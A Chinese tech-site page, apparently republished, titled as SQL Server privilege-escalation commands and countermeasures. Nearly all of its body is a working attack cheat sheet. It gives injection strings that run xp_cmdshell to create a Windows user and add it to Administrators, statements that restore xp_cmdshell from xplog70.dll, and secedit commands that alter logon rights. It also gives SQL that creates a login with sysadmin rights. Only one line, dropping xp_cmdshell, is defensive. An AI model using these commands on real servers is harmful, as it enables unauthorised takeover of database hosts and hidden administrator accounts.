当前位置:  数据库>sqlserver

SQL Server权限提升命令及防范措施

    来源: 互联网  发布时间:2014-08-29

    本文导语:  SQL Server权限提升命令及防范措施 ;exec master..xp_cmdshell "net user name password /add"-- ;exec master..xp_cmdshell "net localgroup administrators name /add"-- 程序代码开启cmdshell的SQL语句   代码如下: EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 判断...

SQL Server权限提升命令及防范措施
;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup administrators name /add"--

程序代码开启cmdshell的SQL语句
 

代码如下:
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
 

代码如下:
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

恢复xp_cmdshell
 

代码如下:
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'

堵上cmdshell的SQL语句
 

代码如下:

sp_dropextendedproc "xp_cmdshell"
DOS:
dir c:/
dir d:/
dir e:/

net user TsInternetUsers Password /add
net localGroup Administrators TsInternetUsers /add

备份恢复IPSEC
 

代码如下:

secedit /export /CFG c:/tmp.inf
echo sedenynetworklogonright =>>c:/tmp.inf
secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf

SQL:
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin


    
 
 

您可能感兴趣的文章:

  • PHP防范SQL注入的具体方法详解(测试通过)
  • php防范sql注入方法与实例代码
  • 批量替换sqlserver数据库挂马字段并防范sql注入攻击的代码
  • JSP 防范SQL注入攻击分析
  • 浅谈开启magic_quote_gpc后的sql注入攻击与防范
  • php如何防范sql注入攻击 sql注入原理解析
  • php sql注入攻击与防范注意事项
  • t-sql/mssql用命令行导入数据脚本的SQL语句示例
  • 基于命令行的SQL客户端 SqlShell
  • SQL Server利用bcp命令把SQL语句结果生成文本文件
  • SQLServer中用T—SQL命令查询一个数据库中有哪些表的sql语句
  • Mysql命令行导入sql数据
  • sql语言中delete删除命令语句详解
  • sql server停止与重启命令
  • 如何编写Shell,当SQL执行完毕后,继续调用Shell命令。
  • Oracle中备份表的简单sql命令语句
  • C处理SQL命令字符串的函数哪里有?
  • mysql source 命令导入大的sql文件的方法
  • SQL建立数据库及删除数据库命令
  • SQL 提权 常用命令
  • Mysql命令行导入sql数据的代码
  • SQLServer用t-sql命令批量删除数据库中指定表(游标循环删除)
  • 在linux中导入sql文件的方法分享(使用命令行转移mysql数据库)
  • 如何用SQL命令查看Mysql数据库大小
  • 为什么这个sql命令没有正确结束
  • mysql命令行还原phpMyAdmin导出的含有中文的SQL文件
  • 在SQL Server中使用命令调用SSIS包的具体方法
    •  
    本站(WWW.)旨在分享和传播互联网科技相关的资讯和技术,将尽最大努力为读者提供更好的信息聚合和浏览方式。
    本站(WWW.)站内文章除注明原创外,均为转载、整理或搜集自网络。欢迎任何形式的转载,转载请注明出处。












  • 相关文章推荐
  • SQL Server降权运行 SQL Server 2000以GUESTS权限运行设置方法
  • 有关sql server 2008 数据库自动备份作业的权限问题
  • 使SQL用户只能看到自己拥有权限的库(图文教程)
  • SQL Server SA权限总结经典技术
  • 有关SQL Server SA权限问题的小结
  • SQL Server中查询用户的对象权限和角色的实例代码
  • java命名空间java.sql接口statement的类成员方法: executeupdate定义及介绍
  • 请问,这是什么错误!java.sql.SQLException: [Microsoft][ODBC SQL Server Driver][Named Pipes]??????? SQL Server?虽然分少,但一定给,只要您是前5名回复者中最好的以为!
  • java命名空间java.sql接口connection的类成员方法: nativesql定义及介绍
  • SQL查询分析工具 SQL Workbench/J
  • java命名空间java.sql接口preparedstatement的类成员方法: executeupdate定义及介绍
  • oracle导出sql语句的结果集和保存执行的sql语句(深入分析)
  • java命名空间java.sql接口rowid的类成员方法: getbytes定义及介绍
  • SQL Server统计SQL语句执行时间的脚本
  • java命名空间java.sql接口ref的类成员方法: getbasetypename定义及介绍
  • SQL客户端软件 PKLite SQL Client
  • java命名空间java.sql接口databasemetadata的类成员方法: getsqlkeywords定义及介绍
  • SQL语句实现SQL Server 2000及Sql Server 2005日志收缩(批量)
  • java命名空间java.sql接口rowid的类成员方法: tostring定义及介绍
  • SQL客户端管理工具 SQuirreL SQL Client
  • java命名空间javax.sql.rowset接口joinrowset的类成员方法: getwhereclause定义及介绍
  • 如何处理此错误:java.sql.SQLException: [Microsoft][ODBC SQL Server Driver]没有执行可选特性
  • java命名空间java.sql接口statement的类成员方法: execute定义及介绍
  • sql2005 大数据量检索分页的sql代码
  • java命名空间java.sql接口resultset的类成员方法: getcursorname定义及介绍
  • 如何实现连接一次数据库,提交多个sql语句。(sql的批处理)
  • java命名空间java.sql接口resultsetmetadata的类成员方法: getcolumntype定义及介绍
  • 微软网站下载的Ms SQL Server2000 JDBC Driver,必须用英文版的SQL server2000吗?


    • 站内导航:


    特别声明:169IT网站部分信息来自互联网,如果侵犯您的权利,请及时告知,本站将立即删除!

    ©2012-2021,,E-mail:www_#163.com(请将#改为@)

    浙ICP备11055608号-3